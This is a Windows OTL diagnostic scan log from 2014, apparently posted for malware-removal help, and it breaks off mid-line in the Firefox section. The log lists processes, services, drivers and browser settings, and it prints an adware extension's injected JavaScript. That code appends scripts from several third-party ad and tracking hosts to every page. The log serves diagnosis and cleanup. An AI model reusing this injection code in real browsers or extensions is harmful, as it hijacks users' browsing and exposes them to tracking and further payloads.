OTL logfile created on: 2014-12-23 12:24:59 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\dkoloszc\Desktop
64bit- Professional Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17501)
Locale: 00000415 | Country: Poland | Language: PLK | Date Format: yyyy-MM-dd

7,91 Gb Total Physical Memory | 4,87 Gb Available Physical Memory | 61,64% Memory free
15,81 Gb Paging File | 12,02 Gb Available in Paging File | 76,03% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 226,19 Gb Total Space | 143,45 Gb Free Space | 63,42% Space Free | Partition Type: NTFS
Drive Y: | 12,25 Gb Total Space | 4,35 Gb Free Space | 35,50% Space Free | Partition Type: NTFS
Drive Z: | 3246,46 Gb Total Space | 3,55 Gb Free Space | 0,11% Space Free | Partition Type: NTFS

Computer Name: LOD-XDKOLOSZC | User Name: dkoloszc | NOT logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

========== Processes (SafeList) ==========

PRC - File not found --
PRC - [2014-12-23 12:24:06 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\dkoloszc\Desktop\OTL.exe
PRC - [2014-12-06 02:50:53 | 000,856,904 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
PRC - [2014-12-05 02:09:46 | 003,346,192 | ---- | M] ( Rsupport Corporation) -- C:\Program Files (x86)\RSUPPORT\MobizenService\MobizenService.exe
PRC - [2014-12-03 07:31:16 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2014-12-01 16:55:24 | 004,907,232 | ---- | M] (Emsisoft GmbH) -- C:\Program Files (x86)\Emsisoft Anti-Malware\a2service.exe
PRC - [2014-12-01 16:55:22 | 004,954,576 | ---- | M] (Emsisoft GmbH) -- C:\Program Files (x86)\Emsisoft Anti-Malware\a2guard.exe
PRC - [2014-11-07 02:06:23 | 001,016,104 | ---- | M] () -- C:\Program Files (x86)\RSUPPORT\MobizenService\dat\adb.exe
PRC - [2014-10-29 23:25:46 | 004,673,432 | ---- | M] (Akamai Technologies, Inc.) -- C:\Users\dkoloszc\AppData\Local\Akamai\netsession_win.exe
PRC - [2014-08-20 09:38:58 | 000,788,776 | ---- | M] (Rsupport corporation) -- C:\Program Files (x86)\RSUPPORT\MobizenService\MobizenTray.exe
PRC - [2014-08-14 23:51:42 | 000,095,016 | ---- | M] (Cisco WebEx LLC) -- C:\Program Files (x86)\WebEx\Productivity Tools\ptSrv.exe
PRC - [2014-08-14 23:51:40 | 000,488,744 | ---- | M] (Cisco WebEx LLC) -- C:\Program Files (x86)\WebEx\Productivity Tools\PTIM.exe
PRC - [2014-08-14 23:51:40 | 000,386,344 | ---- | M] (Cisco WebEx LLC) -- C:\Program Files (x86)\WebEx\Productivity Tools\ptoneclk.exe
PRC - [2014-08-12 10:42:08 | 000,736,768 | ---- | M] () -- C:\Program Files (x86)\Syncios\SynciosDeviceService.exe
PRC - [2014-07-17 15:48:42 | 000,472,320 | ---- | M] (Trend Micro Inc.) -- C:\Program Files (x86)\Trend Micro\OfficeScan Client\CNTAoSMgr.exe
PRC - [2014-03-21 01:40:50 | 002,691,480 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
PRC - [2014-03-18 22:18:30 | 000,419,704 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Adobe\Adobe Creative Cloud\HEX\Adobe CEF Helper.exe
PRC - [2014-02-19 05:06:04 | 000,769,904 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe
PRC - [2014-02-18 16:03:26 | 004,697,968 | ---- | M] () -- C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncV1\CoreSync.exe
PRC - [2013-09-12 22:55:30 | 000,390,616 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
PRC - [2013-09-12 22:55:14 | 000,169,432 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
PRC - [2013-09-11 03:00:00 | 000,642,232 | ---- | M] (Microsoft Corporation) -- C:\Windows\CCM\SCNotification.exe
PRC - [2013-06-25 16:01:18 | 001,132,920 | ---- | M] (Motorola Solutions, Inc.) -- C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
PRC - [2013-05-29 21:09:02 | 000,286,704 | ---- | M] (Intel Corporation) -- C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
PRC - [2013-05-29 21:09:02 | 000,015,344 | ---- | M] (Intel Corporation) -- C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
PRC - [2013-05-23 15:17:24 | 004,124,760 | ---- | M] (SoftThinks - Dell) -- C:\Program Files (x86)\Dell Backup and Recovery\Toaster.exe
PRC - [2013-05-23 15:17:06 | 001,915,480 | ---- | M] (SoftThinks SAS) -- C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe
PRC - [2013-04-26 17:41:06 | 000,292,848 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
PRC - [2013-04-23 22:51:04 | 000,960,888 | ---- | M] (Motorola Solutions, Inc.) -- C:\Program Files (x86)\Intel\Bluetooth\btplayerctrl.exe
PRC - [2013-04-23 22:50:50 | 001,366,392 | ---- | M] (Motorola Solutions, Inc.) -- C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe
PRC - [2013-04-23 22:50:46 | 001,153,400 | ---- | M] (Motorola Solutions, Inc.) -- C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
PRC - [2011-12-16 22:17:32 | 000,462,974 | ---- | M] (Creative Technology Ltd) -- C:\Program Files (x86)\Dell Webcam\Dell Webcam Central\WebcamDell2.exe
PRC - [2009-02-04 14:35:00 | 000,078,848 | ---- | M] (DameWare Development) -- C:\Windows\SysWOW64\DWRCST.EXE
PRC - [2009-02-04 14:34:46 | 000,234,496 | ---- | M] (DameWare Development LLC) -- C:\Windows\SysWOW64\DWRCS.EXE

========== Modules (No Company Name) ==========

MOD - [2014-12-06 02:50:50 | 009,009,480 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\39.0.2171.95\pdf.dll
MOD - [2014-12-06 02:50:46 | 001,077,064 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\39.0.2171.95\libglesv2.dll
MOD - [2014-12-06 02:50:45 | 000,211,272 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\39.0.2171.95\libegl.dll
MOD - [2014-12-06 02:50:44 | 001,677,128 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\39.0.2171.95\ffmpegsumo.dll
MOD - [2014-11-21 16:00:42 | 001,920,512 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\16c1dbd6f93dcb120eef2ae20742b8ec\Microsoft.VisualBasic.ni.dll
MOD - [2014-11-21 16:00:40 | 000,790,528 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#\a7b0df9c8a43432068cef3c2f1e2f987\System.Runtime.Remoting.ni.dll
MOD - [2014-10-24 11:25:20 | 002,959,360 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\9f693486073df43921547e95dcec8e89\System.IdentityModel.ni.dll
MOD - [2014-10-24 11:25:18 | 000,523,776 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\b7ef611f4ae747d248ddfaa47174dcb3\System.Net.Http.ni.dll
MOD - [2014-10-24 11:25:17 | 019,543,552 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\0ee8f72a7cf63a20638c6b57ead95793\System.ServiceModel.ni.dll
MOD - [2014-10-24 11:25:08 | 001,075,712 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\0f9d5b9b1391247d37be668f21f06a5e\System.ServiceModel.Web.ni.dll
MOD - [2014-10-24 08:34:46 | 000,902,144 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\SCNotification\8cdd19268ddb2c6b7ba8c6e8c06385bd\SCNotification.ni.exe
MOD - [2014-10-24 08:34:45 | 000,482,304 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\SCClient.Data\6701ecfe04244c6e9d6d17753068c4ee\SCClient.Data.ni.dll
MOD - [2014-10-24 08:34:45 | 000,444,416 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\SCClient.Common\1a9ce6339c0203d474c17d7459baaadc\SCClient.Common.ni.dll
MOD - [2014-10-24 08:34:45 | 000,397,312 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\7e789f4da59ec129f51132de665b1f53\System.Xml.Linq.ni.dll
MOD - [2014-10-23 14:55:38 | 018,545,152 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\2a1df337efa2dc04d317540acde1ce2f\PresentationFramework.ni.dll
MOD - [2014-10-23 14:55:28 | 010,926,592 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\79105e7449ea97680af196e30c551165\PresentationCore.ni.dll
MOD - [2014-10-23 14:55:25 | 001,880,576 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\75576226f24bd0cea3fb0c0d1f010410\System.Xaml.ni.dll
MOD - [2014-10-23 14:55:21 | 012,700,160 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\0bf718f6921da10929df3b244fd2494f\System.Windows.Forms.ni.dll
MOD - [2014-10-23 14:55:20 | 000,462,336 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#\3cc988049412723069aee05ea4f540af\PresentationFramework.Aero.ni.dll
MOD - [2014-10-23 14:55:17 | 003,910,144 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\04deb37ab2a41a7caa5e46435afc7e51\WindowsBase.ni.dll
MOD - [2014-10-23 14:55:14 | 007,573,504 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\8f294be4e4b9efc88db041576bd1ce56\System.Xml.ni.dll
MOD - [2014-10-23 14:55:14 | 006,998,016 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\95310fc0474a1aca96bfe04573fccb3b\System.Core.ni.dll
MOD - [2014-10-23 14:55:13 | 002,786,304 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\3266a2f34f11281b62bda23f09d0173d\System.Runtime.Serialization.ni.dll
MOD - [2014-10-23 14:55:12 | 000,121,856 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\4b7e744dfed483a36224384a25e6f0d6\SMDiagnostics.ni.dll
MOD - [2014-10-23 14:55:11 | 000,792,064 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\9ae2f43c7ebd76ba10547f9ae6c0dffe\System.ServiceModel.Internals.ni.dll
MOD - [2014-10-23 14:55:10 | 001,156,608 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\e97e33f9993d7f8c7c26e721c0575215\System.Management.ni.dll
MOD - [2014-10-23 14:55:10 | 000,964,096 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\1a62a2b95b3fef1ceab604f16423ec3e\System.Configuration.ni.dll
MOD - [2014-10-23 14:55:09 | 001,631,744 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\6040e91de3728c6fe65614e02e3d87a2\System.Drawing.ni.dll
MOD - [2014-10-23 14:55:07 | 009,987,584 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System\36d22dfd5733b9b14fa0812e9159bb22\System.ni.dll
MOD - [2014-10-15 13:56:54 | 000,382,464 | ---- | M] () -- C:\Program Files (x86)\Syncios\DuiLib.dll
MOD - [2014-08-12 10:42:08 | 000,736,768 | ---- | M] () -- C:\Program Files (x86)\Syncios\SynciosDeviceService.exe
MOD - [2014-04-29 17:11:48 | 000,067,072 | ---- | M] () -- C:\Program Files (x86)\Syncios\zlib1.dll
MOD - [2014-03-18 22:22:06 | 032,733,088 | ---- | M] () -- C:\Program Files (x86)\Adobe\Adobe Creative Cloud\HEX\libcef.dll
MOD - [2014-02-18 16:03:26 | 004,697,968 | ---- | M] () -- C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncV1\CoreSync.exe
MOD - [2014-02-14 16:44:57 | 016,546,816 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\178f0b9d1e139fac0d3655add71fafa8\mscorlib.ni.dll
MOD - [2014-01-20 13:17:04 | 000,073,544 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
MOD - [2014-01-20 13:16:40 | 000,237,384 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll
MOD - [2014-01-20 13:16:38 | 001,044,808 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
MOD - [2014-01-06 11:24:24 | 000,671,744 | ---- | M] () -- C:\Program Files (x86)\Syncios\hashAB.dll
MOD - [2013-05-02 23:01:12 | 001,813,792 | ---- | M] () -- C:\Program Files (x86)\Dell Backup and Recovery\OLCoreWrapper.dll
MOD - [2013-03-01 10:30:42 | 000,059,904 | ---- | M] () -- C:\Program Files (x86)\Syncios\zlib.dll
MOD - [2013-03-01 10:30:34 | 000,526,848 | ---- | M] () -- C:\Program Files (x86)\Syncios\sqlite3.dll
MOD - [2010-03-24 21:17:36 | 008,794,464 | ---- | M] () -- C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll
MOD - [2010-01-30 02:41:12 | 004,254,560 | ---- | M] () -- C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF

========== Services (SafeList) ==========

SRV - [2014-12-11 10:30:48 | 000,315,496 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2014-12-10 11:43:11 | 000,267,440 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2014-12-05 02:09:46 | 003,346,192 | ---- | M] ( Rsupport Corporation) [Auto | Running] -- C:\Program Files (x86)\RSUPPORT\MobizenService\MobizenService.exe -- (Mobizen plugin)
SRV - [2014-12-03 07:31:16 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2014-12-01 16:55:24 | 004,907,232 | ---- | M] (Emsisoft GmbH) [Auto | Running] -- C:\Program Files (x86)\Emsisoft Anti-Malware\a2service.exe -- (a2AntiMalware)
SRV - [2014-11-14 03:42:30 | 000,114,288 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2014-10-13 11:16:54 | 004,668,864 | ---- | M] (Trend Micro Inc.) [Auto | Running] -- C:\Program Files (x86)\Trend Micro\OfficeScan Client\TmListen.exe -- (tmlisten)
SRV - [2014-10-13 11:13:24 | 004,688,200 | ---- | M] (Trend Micro Inc.) [Auto | Running] -- C:\Program Files (x86)\Trend Micro\OfficeScan Client\Ntrtscan.exe -- (ntrtscan)
SRV - [2014-04-07 22:54:36 | 000,701,064 | ---- | M] (Trend Micro Inc.) [On_Demand | Running] -- C:\Program Files (x86)\Trend Micro\OfficeScan Client\CCSF\TmCCSF.exe -- (TmCCSF)
SRV - [2014-03-20 23:49:18 | 000,067,224 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2014-03-19 20:08:22 | 000,575,024 | ---- | M] (Trend Micro Inc.) [On_Demand | Running] -- C:\Program Files (x86)\Trend Micro\BM\TMBMSRV.exe -- (TMBMServer)
SRV - [2014-02-28 10:32:36 | 000,174,368 | ---- | M] () [On_Demand | Stopped] -- C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe -- (iumsvc)
SRV - [2014-01-28 10:42:32 | 000,929,328 | ---- | M] (Trend Micro Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\Trend Micro\OfficeScan Client\TmProxy.exe -- (TmProxy)
SRV - [2013-09-12 22:55:30 | 000,390,616 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2013-09-12 22:55:14 | 000,169,432 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe -- (jhi_service)
SRV - [2013-09-11 03:00:00 | 001,571,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\CCM\CcmExec.exe -- (CcmExec)
SRV - [2013-09-11 03:00:00 | 000,577,720 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\CCM\RemCtrl\CmRcService.exe -- (CmRcService)
SRV - [2013-09-11 03:00:00 | 000,276,152 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\CCM\TSManager.exe -- (smstsmgr)
SRV - [2013-08-07 21:27:28 | 000,199,176 | ---- | M] (Dell Products, LP.) [Auto | Stopped] -- c:\Program Files (x86)\Dell Digital Delivery\DeliveryService.exe -- (DellDigitalDelivery)
SRV - [2013-07-30 20:14:42 | 000,124,616 | ---- | M] () [On_Demand | Stopped] -- C:\Program Files (x86)\Invincea\Enterprise\Sandbox\SboxSvc.exe -- (SboxSvc)
SRV - [2013-07-30 20:14:40 | 002,947,856 | ---- | M] (Invincea, Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\Invincea\Enterprise\X64\InvProtectSvc64.exe -- (InvProtectSvc)
SRV - [2013-07-04 06:39:24 | 000,279,024 | ---- | M] (Intel Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\IntelCpHeciSvc.exe -- (cphs)
SRV - [2013-06-25 16:01:18 | 001,132,920 | ---- | M] (Motorola Solutions, Inc.) [Auto | Running] -- C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe -- (Bluetooth Device Monitor)
SRV - [2013-05-23 15:17:06 | 001,915,480 | ---- | M] (SoftThinks SAS) [Auto | Running] -- C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe -- (SftService)
SRV - [2013-04-23 22:50:50 | 001,366,392 | ---- | M] (Motorola Solutions, Inc.) [Auto | Running] -- C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe -- (Bluetooth Media Service)
SRV - [2013-04-23 22:50:46 | 001,153,400 | ---- | M] (Motorola Solutions, Inc.) [Auto | Running] -- C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe -- (Bluetooth OBEX Service)
SRV - [2012-07-09 07:40:10 | 000,104,912 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2009-02-04 14:34:46 | 000,234,496 | ---- | M] (DameWare Development LLC) [Auto | Running] -- C:\Windows\SysWOW64\DWRCS.EXE -- (DWMRCS)

========== Driver Services (SafeList) ==========

DRV - [2014-08-30 21:12:00 | 000,351,032 | ---- | M] (Trend Micro Inc.) [Kernel | Auto | Running] -- C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmxpflt.sys -- (TmFilter)
DRV - [2014-08-30 21:11:52 | 000,044,856 | ---- | M] (Trend Micro Inc.) [Kernel | Auto | Running] -- C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmpreflt.sys -- (TmPreFilter)
DRV - [2014-08-30 21:04:28 | 002,316,600 | ---- | M] (Trend Micro Inc.) [Kernel | Auto | Running] -- C:\Program Files (x86)\Trend Micro\OfficeScan Client\VsapiNT.sys -- (VSApiNt)
DRV - [2014-05-12 17:43:58 | 000,071,472 | ---- | M] (Emsisoft GmbH) [File_System | On_Demand | Running] -- C:\Program Files (x86)\Emsisoft Anti-Malware\a2accx64.sys -- (a2acc)
DRV - [2014-05-12 17:43:56 | 000,023,088 | ---- | M] (Emsisoft GmbH) [File_System | System | Running] -- C:\Program Files (x86)\Emsisoft Anti-Malware\a2util64.sys -- (a2util)
DRV - [2013-12-04 18:23:36 | 000,057,024 | ---- | M] (Emsisoft GmbH) [File_System | On_Demand | Running] -- C:\Program Files (x86)\Emsisoft Anti-Malware\cleanhlp64.sys -- (cleanhlp)
DRV - [2013-09-30 17:23:02 | 000,045,208 | ---- | M] (Emsisoft GmbH) [File_System | System | Running] -- C:\Program Files (x86)\Emsisoft Anti-Malware\a2dix64.sys -- (a2injectiondriver)
DRV - [2013-07-30 20:14:42 | 000,202,248 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\Invincea\Enterprise\Sandbox\SboxDrv.sys -- (SboxDrv)
DRV - [2013-07-30 20:14:40 | 000,034,824 | ---- | M] () [File_System | On_Demand | Stopped] -- C:\Program Files (x86)\Invincea\Enterprise\X64\InvProtectDrv64.sys -- (InvProtectDrv)
DRV - [2013-03-28 18:03:02 | 000,026,176 | ---- | M] (Emsisoft GmbH) [File_System | System | Running] -- C:\Program Files (x86)\Emsisoft Anti-Malware\a2ddax64.sys -- (A2DDA)
DRV - [2009-07-14 02:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)

========== Standard Registry (SafeList) ==========

========== Internet Explorer ==========

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{6A95B20D-AC62-429B-80C4-8F7230A453FE}: "URL" = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=DCJB
IE - HKU\.DEFAULT\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-18\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-19\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-20\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-21-2371548481-2500731307-350997382-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://dell13.msn.com/?pc=DCJB
IE - HKU\S-1-5-21-2371548481-2500731307-350997382-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://dell13.msn.com/?pc=DCJB
IE - HKU\S-1-5-21-2371548481-2500731307-350997382-1000\..\SearchScopes,DefaultScope = {410CE52B-292E-4130-8FC8-25C25CE3AE78}
IE - HKU\S-1-5-21-2371548481-2500731307-350997382-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-21-29074177-2114273088-3454551869-225919\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com
IE - HKU\S-1-5-21-29074177-2114273088-3454551869-225919\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = Preserve
IE - HKU\S-1-5-21-29074177-2114273088-3454551869-225919\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKU\S-1-5-21-29074177-2114273088-3454551869-225919\..\SearchScopes,DefaultScope = {86B17854-62A7-4ADC-A917-B1E3E6A09144}
IE - HKU\S-1-5-21-29074177-2114273088-3454551869-225919\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC
IE - HKU\S-1-5-21-29074177-2114273088-3454551869-225919\..\SearchScopes\{86B17854-62A7-4ADC-A917-B1E3E6A09144}: "URL" = https://www.google.com/search?q={searchTerms}
IE - HKU\S-1-5-21-29074177-2114273088-3454551869-225919\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-21-29074177-2114273088-3454551869-225919\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local;

========== FireFox ==========

FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:33.1.1
FF - prefs.js..extensions.lB5Ci8CruTmZFPsg.scode: "try{(function(){try{var url=(window.self.location.href + 
script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1749/l.js?aoi=1311798366&pid=1749&zoneid=458516&ext=BuyNsave&systemid=11783967167233671948&ext=BuyNsave\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;try{new function(){if(null==document.getElementById(\"id_ad5cbe0b719874f1\")&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"http://istatic.datafastguru.info/fo/min/wpgb.js?bname=BuyNsave&subid=78_21566\";a.setAttribute(\"id\",\"id_ad5cbe0b719874f1\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;(function(){if(!document.getElementById(\"qwejkhjkshdfs_4\")&&window.self==window.top){var a=document.createElement(\"script\");a.id=\"inj_grazit_script_starter\";a.type=\"text/javascript\";a.src=\"//ext1.engageya.com/widget/inject_spark/inj_sprk_starter.js?pid=LTEsMTQyNTU5LDk0NjA4LDU0OTcx&subid=78_21566&appname=BuyNsave\";a.setAttribute(\"id\",\"qwejkhjkshdfs_4\");document.getElementsByTagName(\"head\")[0].appendChild(a)}})();;new function(){if(null==document.getElementById(\"id_a922982530c\")&&window.self==window.top){var a=document.createElement(\"script\");a.setAttribute(\"type\",\"text/javascript\");a.setAttribute(\"id\",\"id_a922982530c\");a.setAttribute(\"src\",\"https://client.foxydeal.com/sf/1054/78X21566/\"+document.location.hostname+\"?partnerName=BuyNsave\");document.getElementsByTagName(\"head\")[0].appendChild(a)}};;try{new function(){if(null==document.getElementById(\"id_a02b170eff6bb769\")&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//cjs.linkbolic.com/scjs/cjs/ctxjs.js?aff_id=1151&subaff_id=78_21566&sbrand=BuyNsave\";a.setAttribute(\"id\",\"id_a02b170eff6bb769\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};})();}catch(e){}"); FF - user.js - File not found FF - 
HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_246.dll () FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll () FF - HKLM\Software\MozillaPlugins\@erdas.com/ERDAS Image Web Server ECW JPEG2000 Plugin,version=14.0: C:\Program Files (x86)\ERDAS\Image Web Server\Firefox Chrome Plug-in\NP_NCS6.dll (ERDAS) FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation) FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI updater: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation) FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.71.2: C:\Program Files 